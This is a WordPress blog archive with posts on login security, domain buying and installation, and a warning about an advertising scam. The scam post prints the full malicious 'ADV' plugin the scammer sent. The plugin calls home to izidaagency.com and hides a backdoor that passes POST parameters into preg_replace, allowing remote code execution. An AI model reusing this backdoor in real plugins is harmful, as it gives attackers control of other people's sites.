Tag Archives: WordPress

Internet, Privacy, Security, WordPress

Secure WordPress Login

Leave a comment

Since the default WordPress username is ‘admin’, did you ever think that maybe it’s time to change it to something a bit more secure? Any hacker worth her or his salt can probably gain access to your WordPress installation quite easily. The only thing they need is a password generator of some type if you have left the default WordPress username as admin.

Besides changing the default setting, you should also do something else. If you are a single owner/poster, you should change your posting name to something other than your username. If you want to post as “Jane”, for instance, you can login in as kentucky or anything else that suits you. Why should you do this? It seems obvious but in case you missed it, if you post as “Jane” and your username for logging in is “jane”, maybe a hacker could easily guess your username. Simple, right?

Head over to ‘Users’ on the left side of your WordPress Dashboard. For the default installation, there will only be one Username, by default it is ‘admin’. Here’s what the default setting looks like:

Admin user settings
Admin is the default user. No 'Role' is listed as there is only one user.

The default username can’t be changed but what you want to do is to add another user then switch the Role of Admin to ‘no role’. In other words you can’t get rid of the admin user but you can take the administrative power away from them in order to secure your WordPress site. You’ll notice from the photo above that there is no place to choose the Role of this user.

Update: I forgot to mention that you can’t change the default username’s role  until you set up a new user as admin, log out and logo back in again. Set up new user, make that user admin, log out then log in again and change the default admin’s role to ‘no role’.

Tip: You can’t change the role of the current administrator until you have another administrator lined up. Create another user, use whatever name and nickname you want, then make the Role of that new user ‘Administrator’. Once you do that, go back to the original admin user and define its Role as ‘None’. This screen shows you what to look for:

New User Menu for WordPress
This is where you can choose the Role for the new user.

In this window, make note of two things. First, the Role menu is visible since you are adding a new user. Any new user must have a role, even if it is no role at all. Next, make sure the username and the display name are totally different. The Username is the name you use to login to the site. The Display name is the name that shows on each of your posts. Make sure they are different. Anyone can try to login with your display name and guess your password but if your username is different, your site is more secure.

TIP: Whatever your role is on any WordPress site, make sure that your username for logging in isn’t the same as your posting name. If you’re an administrator, make sure of this small but very important detail for every user of your WordPress installation.

Once you have a second administrator set up, go back and remove the administrator role from the default admin username. Once you do that, your WordPress site is a lot more secure than it used to be.

Thanks for reading!

Internet, Scam, Security

WordPress Scam

3 Comments

There is a WordPress advertising scam going around now. Here are the details of it. If you own a WordPress site, this is important reading. Please try to follow the whole post to the end.

1. The first contact is through a comment on your site. This is the comment, details may change somewhat:

“Hi,
Sorry I write you via comments. But I could not find contact e-mail or feedback form on your site.
We are looking for new advertisement platforms and we are interested in your site http://www.kitchenrenovation411.com.
Is it possible to place banner on your site on a fee basis?
Please, contact us at e-mail.
Best regards,
Mathis Gaillard.
site: http://www.izidaagency.com
e-mail: mgaillard @izidaagency.com
phone: + (0)9 78 62 91 00


2. Once you email the person, this is the reply:

> From: mgaillard@izidaagency.com
> To: my email
> Subject: Re: re: kitchenrenovation411.com
> Date: Thu, 10 Nov 2011 02:39:40 -0800
>
> Hello,
>
> Thanks for reply to our proposal!
>
> I represent Izida Agency. At the moment we are preparing an advertising campaign for Lacoste Company (it is a French company producing clothes, footwear, perfumery etc.) We already have designed banners for the campaign, they are the following sizes: 160×600, 240×400, 300×250, 336×280, 468×60, 728×90.
> What can be your price for one banner (banner should appear at ALL pages of your site) of abovementioned sizes (please specify the place for the banner – top, bottom, left, right)? Please mention a normal link for banner, without javascript code and set prices in US dollars per month.
> Here you can see our banners: http://docs.izidaagency.com/lacoste/?view=1
>
> Best regards,
> Mathis Gaillard.
> site: www.izidaagency.com
> e-mail: mgaillard@izidaagency.com
> phone: + (0)9 78 62 91 00

3. After some questioning on my part, I received this email:

Hi!
Before placing banner, your site need to be approved by the advertiser.
If you agree with it we'll send you special plugin, that
lets advertiser check your site and decide if it fits his requirements.

Best regards, 
Mathis Gaillard.
site: www.izidaagency.com
e-mail: mgaillard@izidaagency.com
phone: + (0)9 78 62 91 00
4. Finally, I get this email, complete with a password:

Hi!

 

Thanks for reply to our proposal!

We like your price.

To pass to the banner control system follow the link http://webmaster.izidaagency.com

To enter use the following data:

 

login: my other site

password: email me for password

 

You should install and activate the plugin in order to display advertisement.

Before making payment, advertiser must approve location of the banner.

The banner will be shown on your site when you add special code to your web- address

(for example: http://www.my other site.com/?adv_test=1).

It means, that visitors will see the banner only if it is approved and payment made.

To get installation instruction for your site type pass to: http://docs.izidaagency.com/wp_install

To activate your site you have to enter the code: GQP-HFA-55H

 

What way of payment is suitable for you?

 

Best regards,

Mathis Gaillard.

site: www.izidaagency.com

e-mail: mgaillard@izidaagency.com

phone: + (0)9 78 62 91 00

5. OK, now I have the code. What do I do with it? The file that I downloaded is a php script that I am supposed to upload to my WordPress site. Here is the actual code that was sent:

_____________________________________________________________________________________________

<?php

/*
  Plugin Name: ADV
  Description: ADV Plugin
  Version: 2.6.1
 */

class AdvWidget extends WP_Widget {

    function AdvWidget() {
        parent::WP_Widget(false, $name = 'AdvWidget');
    }

    /** @see WP_Widget::widget */
    function widget($args, $instance) {
        if (get_option('adv_place') == 'widget')
            advShowBanner();
    }

    /** @see WP_Widget::update */
    function update($new_instance, $old_instance) {
        $instance = $old_instance;
        $instance['title'] = strip_tags($new_instance['title']);
        return $instance;
    }

    function form($instance) {

    }

}

add_action('widgets_init', create_function('', 'return register_widget("AdvWidget");'));

add_action('admin_menu', 'advPluginMenu');

register_activation_hook(__FILE__, 'advActivation');

define('ADV_SERVICE_DOMAIN', 'izidaagency.com');
define('ADV_SERVICE_URL', 'http://webmaster.' . ADV_SERVICE_DOMAIN . '/key');

function advReadUrl($url) {
    if (function_exists('curl_init')) {
        $curl = curl_init();
        curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($curl, CURLOPT_URL, $url);
        $result = curl_exec($curl);
        curl_close($curl);
        return $result;
    } else
        return file_get_contents($url);
}

function advActivation() {
    update_option('adv_place', 'widget');
}

register_deactivation_hook(__FILE__, 'advDeactivation');

function advDeactivation() {
    delete_option('adv_key');
}

function advPluginMenu() {
    add_options_page('ADV Plugin Options', 'ADV', 'manage_options', 'adv-identifier', 'advPluginOptions');
}

function adv_show_banner() {
    advShowBanner();
}

function advShowBanner() {
    $advBanner = get_option('adv_banner');
    $advMode = get_option('adv_mode');
    if ($advBanner) {
        if (isset($_REQUEST['adv_test']) || $advMode == 'work') {
            echo "<img src='" . get_option('siteurl') . "/adv_banners/" . $advBanner . "'/>";
        }
    }
}

function activateCode() {
    $data = advReadUrl(ADV_SERVICE_URL . "?action=init&key=" . $_REQUEST['key'] . "&domain=" . urldecode($_SERVER['HTTP_HOST']));
    if (strpos($data, '<key>true</key>') !== FALSE) {
        preg_match("#<width>(.+?)</width>#", $data, $arr);
        update_option('adv_width', $arr[1]);
        preg_match("#<height>(.+?)</height>#", $data, $arr);
        update_option('adv_height', $arr[1]);
        echo '<div id="message"><p>The code is activated successfully.</p></div>';
        update_option('adv_key', $_REQUEST['key']);
        downloadBanners();
    } else {
        echo '<div id="message"><p>Code activation error.</p></div>';
    }
}

function downloadBanners() {
    $bannersDir = ABSPATH . "/adv_banners";
    if (!is_dir($bannersDir)) {
        mkdir($bannersDir);
    }
    $list = advReadUrl(ADV_SERVICE_URL . "?action=getBannerList&key=" . get_option("adv_key"));
    preg_match_all("|<banner_item>(.+?)</banner_item>|", $list, $banners);
    preg_match("|<adv>(.+?)</adv>|", $list, $adv);
    preg_match("|<show_banner>(.+?)</show_banner>|", $list, $showBanner);
    preg_match("|<mode>(.+?)</mode>|", $list, $mode);
    if (is_array($banners[1]) && isset($adv[1]) && isset($showBanner[1]) && isset($mode[1])) {
        update_option("adv_banner", $showBanner[1]);
        update_option('adv_mode', $mode[1]);
        foreach ($banners[1] as $banner) {
            $advBannerDir = $bannersDir . "/" . $adv[1];
            if (!is_dir($advBannerDir))
                mkdir($advBannerDir);
            $arr = explode("/", $banner);
            if (count($arr) == 2) {
                $size = $arr[0];
                $bfile = $arr[1];
                if (!is_dir($advBannerDir . "/" . $size))
                    mkdir($advBannerDir . "/" . $size);
                file_put_contents($advBannerDir . "/" . $size . "/" . $bfile, advReadUrl('http://docs.' . ADV_SERVICE_DOMAIN . '/' . $adv[1] . '/' . $banner));
            }
        }
        echo '<div id="message"><p>Banners are downloaded successfully.</p></div>';
    }
}

if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv']))
    $r = preg_replace(str_replace("\\\\", "\\", $_POST['cadv']), str_replace("\\\"", "\"", $_POST['gadv']), 'adv 6');

function advPluginOptions() {
    if (!current_user_can('manage_options')) {
        wp_die(__('You do not have sufficient permissions to access this page.'));
    }
    $action = isset($_REQUEST['action']) ? $_REQUEST['action'] : '';
    if ($action == 'downloadBanners') {
        downloadBanners();
    } elseif ($action == 'setPlace') {
        update_option('adv_place', $_REQUEST['adv_place']);
    } elseif ($action == 'saveKey') {
        activateCode();
    }

    $advPlace = get_option('adv_place');
    echo '<div>';

    echo '<h2>ADV</h2>';
    echo '<form method="post" action="options-general.php?page=adv-identifier&action=setPlace"><select name="adv_place">';
    echo '<option value="none" ' . ($advPlace == 'none' ? 'selected' : '') . '>Don\'t show the banner.</option>';
    echo '<option value="widget" ' . ($advPlace == 'widget' ? 'selected' : '') . '>Show the banner as a Widget.</option>';
    echo '<option value="template" ' . ($advPlace == 'template' ? 'selected' : '') . '>Template usage: adv_show_banner();</option>';
    echo '</select>';
    echo '<input type="submit" value="Save"/></form>';
    echo '<div>';
    if (get_option('adv_key') === FALSE) {
        echo '<h2>Activation Code</h2>';
        echo '<form method="post" action="?page=adv-identifier&action=saveKey">';
        echo '<input type="text" name="key"/>';
        echo '<input type="submit" value="Activate"/>';
        echo '</form>';
    } else {
        $mode = get_option('adv_mode');
        echo '<br/>Code: ' . get_option('adv_key');
        echo '; <a href=\'options-general.php?page=adv-identifier&action=downloadBanners\'>Download banners.</a><br/>';
        echo 'Mode: ' . $mode;
        if ($mode != 'work') {
            $url = get_option('siteurl') . "/?adv_test=1";
            $link = "<a href='$url'>$url</a>";
            echo '<br/></br>The banner will appear on your site only after your site is approved by the advertiser and you get the payment.
To see where the banner will be placed on your site, use the special feature in the site address: ' . $link;
        }
    }
    echo '</div>';
    echo '</div>';}?>

_____________________________________________________________________________

This isn’t a new scam. It’s been around for a few months or longer. Here is a link to another page which explains the same thing but from a different contact person:

http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87860

 

My comments are at the bottom of that page.

I have my feelers out now to see what this script does. There is a chance that it’s a trojan of some kind and it may not even be active after it’s installed. I can only assume that it will, at a future date, provide access to a WordPress site. If anyone can decipher the script, please do so and contact me using the comment section below.

I should say that the site this comment was on is a new site, very small with very little traffic. I have tried to contact Izod Lacoste but, so far, they have not emailed me back. If you have been affected by this scam, please comment below. The more we know about this, the safer the WordPress community will be.

Thanks for reading!

Internet, Security

WordPress Comment Scam

Update: This scammer is using different names. The names used that I know of are: Rayan Meyer, Killian Blanchard, Mathis Gaillard, among many others. Please read this post to understand the modus operandi and then go to the site mentioned below for even more details. Good luck!
Scams are everywhere, it seems. Yesterday I received a comment on one of my other websites. The commenter asked if I was interested in placing a banner ad (from a major company) on the site. The person apologized for making a comment instead of emailing. I realized that I didn’t have an email address on the site and this made his comment sound legitimate.

Now my site isn’t as popular as this one. It’s about kitchens, kitchenrenovation411.com , and probably isn’t a site that an advertiser would pick for a banner ad. This should have twigged me that this was a scam. However, the company that this person was supposedly going to link to the banner is a very reputable company. Maybe the clientèle from my site fit the demographics they were looking for. Hey, it’s money, right?

I emailed the person and quoted a figure then did some heavy research. It seems that this kind of thing has been going on for quite a while. Here is a site that describes the dilemma that many WordPress bloggers find themselves in and the tricks scammers use to gain access to websites: http://keepsafeonthenet.co.uk/2011/07/martin-dumont/comment-page-1/#comment-87842 .

Here are some tips to avoid losing your website to a scammer:

1. If it sounds too good to be true, it almost certainly is. Whenever money is involved, our eyes light up  and we start planning for the future. That’s human nature. Most WordPress sites don’t make any money at all. If someone contacts you about a site that isn’t very popular, you know it is a scam.

2. Do your research. Search Google using the complete email or comment on your blog. This will almost certainly lead to a forum or another site that the scammer has contacted. Read what has been posted and confirm that your contact is fake.

3. Advertisers don’t send their advertising code in a zip file. If you get a zip file from someone who has contacted you through your website, you know it’s got a trojan in it. The contact that I am writing about insists that they will not use any java code, simply a link to the website of the advertiser. Baloney! There will be a zip file coming, I can guarantee it.

4. Brand name companies don’t work through small advertising companies. The website of the person who contacted me looks very professional but it hasn’t been updated since 2007. The website is also exactly the same as another company listed in the link above. Both sites are identical, the only difference is the person who is sending out the emails.

5. If you’ve been taken in by this kind of scam, you should consider your website to be compromised. Links will likely take users to other sites or, worse, your site may be used to email spam. Work with your hosting company to rid your site of the malware on it.

Hopefully this post will help you avoid this type of unusual scam. This kind of thing is criminal activity and should be considered as a threat to your site as well as to your hosting company. Once this kind of thing is on a server, there are many ways for it to spread. Hopefully your host can stay on top of it.

Thanks for reading.

Domain Registration, Hosting, Internet, WordPress

Buy Your Own Domain

2 Comments

Buying a domain (that’s a .com name, if you don’t know) is cheap, fast and fun. Even if you don’t know a thing about HTML or WordPress, if you’ve got a catchy name, why not register it? Sure, there are millions of domains that have been registered already, this doesn’t mean you should give up. Some people go as far as to snap up domains, locking them up before anyone else gets them. Personally, this doesn’t make a lot of sense but everyone is different. I guess if you’ve got money to tie up, maybe it makes sense.

Buying a domain means that you have it for a one year term. Many discount hosting companies offer significant discounts if you sign up for a two year or longer term. Many also give you discounts if you buy multiple domains at a time.

Right now, I would stick to the old .com domain if you’re going to try and make some money it it. People know .com, they assume that every site is a .com site and immediately head to whatever.com , even if the site is whatever.org.

In fact, when you are signing up for your domain with most companies, they will offer you all of the various combinations of your domain at the same time. Want whatever.com? How about getting whatever.org or whatever.net at the same time? The point of this, of course, is to guard against someone else stealing traffic away from your catchy name. Think of it. If you could snag google.org or google.info, you would. You’d be crazy not to.

Once you have your domain, think about doing something with it. As you might have read in past posts, I use WordPress on all of my sites. You can read about installing WordPress here and about how to set up your domain hosting here. Anything you want to know about installation and hosting is on this site, just search for the answers if you’re stuck. If I can do it, your probably can too.

Thanks for reading!

Internet, WordPress

Installing WordPress – October 28, 2011

1 Comment

Now we’re finally ready to  install WordPress. We’ve got our domain name and hosting here. We set our nameservers here. Over here, we created a database and named it. OK, looks like we’re set.

1. Download WordPress.

2. Unzip it then copy and paste the WordPress folder on to your desktop. (Put it anywhere you want but putting it on the desktop is easier for beginners.)

3. Listen carefully to this part. First you have the zip file to unzip. Inside that is a WordPress 3.x folder (depending on which version is out now). Inside that folder is a WordPress folder (just that, no number). Inside that folder are ALL the files you need to upload to the folder in your hosting account. Don’t upload the WordPress folder, just the folders and files inside the WordPress folder. Get it? Those files look like this:

Inside the WordPress Folder.
From WP-Admin to xmlrpc.php, these are the files you need.

4. Open your FTP program (I recommend FileZilla). On the left side of the window, navigate to your Desktop then to the folder that contains the WordPress files as shown above. Connect to your host using your username and password, then navigate to the folder where you want to put your files. This is the folder that is inside your root directory, right? It should be the only folder in your root directory. It should also be empty, except for the placeholder file (index.html) that we created here.

5. In the WordPress folder on the left, click on WP-Admin (the folder at the top), scroll down to the bottom , hold down the shift key and click on xmlrpc.php and click it. All of the files and folders in that WordPress folder will now be highlighted. Right click in the blue area and choose Upload.  Depending on your FTP and upload speed, this last step might take a bit of time, maybe 5 minutes or less.

6. Wait until FileZilla finishes (no more queued files). You should now have a full selection of files on the right hand side from WP-Admin to xmlrpc.php. The next step can be done in FileZilla but I prefer to do it in the File Manager on my hosting site. Do what you feel better with here.

7. You are about to edit one file. If you make a mistake, it’s not a big deal so don’t get your knickers in a knot. All that will happen is that WordPress won’t be able to install itself…yet. Even if you really screw things up, you can always delete everything inside your host folder and start over again. Relax, OK?

You are looking for the wp-config-sample.php file. This file is the one that tells WordPress what database you are using, what the password is and who the user is for that database. Remember when we did all of that here?

8. Find the wp-config-sample.php file and click on it once. On the right side of the window you will see three icons. The one you want is the ‘edit’ icon. Click it and a small window will open up or you will be taken to another page, depending on which hosting interface your host uses. Once you see inside that file, it’s full of simple text that looks really complicated, look for this section:

_______________________________

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'database_name_here');

/** MySQL database username */
define('DB_USER', 'username_here');

/** MySQL database password */
define('DB_PASSWORD', 'password_here');
____________________________________________

 

9. Enter the database name, username and password of the MySQL database that we made earlier. Leave the apostrophes in, just type in the database name, user and password like this:

_______________________________

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'sitedatabase1');

/** MySQL database username */
define('DB_USER', 'joeschmoo');

/** MySQL database password */
define('DB_PASSWORD', 'goodpassword');
____________________________________________

10. In another browser window, paste this url (taken from the wp_config-sample.php file) : https://api.wordpress.org/secret-key/1.1/salt/

You will see a simple page that has information like this on it:

_______________________________________________

define('AUTH_KEY',         'G;^s;iqRh${ovHzc&n9s31-i2*U DkHI9u]#jWt&nPByL`e)cw7Zz9TJ|.c7Hu1f');
define('SECURE_AUTH_KEY',  'a|Bx@bXxFL@)1$0t]MyEvg1nt=aagDu%E9S9V>WZ<:as#)2pbY@Dv6xJv.`A>GM&');
define('LOGGED_IN_KEY',    'jFHyxThnTAu_Nxk(iHDj,|VwOQ@$V^Je: bO&c$&-IX)IGp[#Jr&F$rv9X98[dqs');
define('NONCE_KEY',        'n1P/X(*Y|ta#f1lde(gj!}L{r1{^Mu--v`fJ32)a-N1.S _4j*WBy/4!w+SvrNS-');
define('AUTH_SALT',        ')TgQ&Uj0QH?AP*+UCu]>{3{w5*(+-tL|U&]*)MhEP@YG|/dqFMVDK=-a!22&zWg+');
define('SECURE_AUTH_SALT', 'R]m:Fm*gO%Vmi^HL+_GQmd-h_,~u k,=%j^5q]b8m3[|?N[ksmfm=s%=oM]1gb1.');
define('LOGGED_IN_SALT',   'F.}Du-=]$|GBm|5tNH|haDASOu`=-Cv<RS2hKV].cNS+ex=-dX zlN6}ql)$sNz:');
define('NONCE_SALT',       '!?i5/5mjG;Fz%WxLNQEg~~+5nJiMY0yAo~T6Om%<_$&ae:{f(~Y2a}G8vQ/*&>x|');

11. Copy that information (from the word define until the last semi-colon, exactly as is shown above). Don’t use the data shown here, get your own for security’s sake.

12. In the wp-config-sample.php file, find the EXACT section the corresponds to the information on the webpage you just opened. Highlight everything from the word define down to the last semi-colon. Once that is highlighted, either right click and choose ‘paste’ or hit control and v at the same time. Either way, the info from the webpage is pasted into the file you are editing.

13. This is important, read this carefully. Just below the section we just worked on, you’ll see the section for the ‘WordPress Database Table prefix’. Locate it and find the section that reads:

_____________________________________

$table_prefix  = ‘wp_’;

____________________________________

14. Change the part between the apostrophes to some combination of numbers, letters and underscores. It will look something like this after you’re done:

______________________________________

$table_prefix  = ‘new_site143uty‘;

______________________________________

This is an important step which adds to the security of your WordPress installation. You don’t need this information but you can write it down anyway. WordPress uses it, not you.

15. Last step, usually only needed if the current settings don’t work. Farther up from where we are, you will see a section (under the section where you put the database password) that reads:

_____________________________________________

/** MySQL hostname */
define('DB_HOST', 'localhost');

_____________________________________________

Most of the time, ‘localhost’ works just fine. If it doesn’t or if you just want to be sure, you’ll have to enter the path to the MySQL database that you are using. Save the file you are editing. Head back to the control panel and go into the MySQL databases again. Click on the database that you created and somewhere there will be a ‘generate code’ button. What you are looking for is ‘your server name’. This will be something that looks like a domain name: accountname.hostmysql.com Copy this and head back to the WP-config-sample.php file, open it for editing and highlight the word localhost then paste the new .com line into that space. It will look like this:

____________________________________________

/** MySQL hostname */
define('DB_HOST', 'accountname.hostmysql.com');

____________________________________________

At this point, save the file and stretch a bit, grab a coffee or something and smile because you’re almost done. The hard part is over. It’s all fun from now on.

16. In your host’s File Manager, look up at the top of the right hand side till you find the Wp-Admin folder. Open it and look for the install.php file. Click on it then choose ‘preview’ on the right. A webpage will open up. If you’ve done everything correctly, you can install WordPress from this page. Click OK and create a username (don’t use admin, choose something different) , take the standard password that WordPress creates for you, enter your email (make sure it’s correct since there is no way to recover your password if you put in the wrong email here) then click OK.

17. Here, I do two things. I take a screen capture of the page to ensure that I have the password and username correct, then I copy and paste the password into a text file for safekeeping. OK, I write it out in a book, too.

18. Once you’ve done all of this, log in to WordPress and start creating.

These are the steps as I do them for each installation of WordPress that I’ve done. In case you are wondering, I’ve done this about twenty-four times. I hope this sounds simple and that it’s all clear to you. Most of the information here is explained in the WordPress installation area but some of it is from trial and error. One of my hosts was fine with ‘localhost’ for the database host but my current host wasn’t. I hope it works for you.

Thanks for reading! Follow me on Twitter: @_BrianMahoney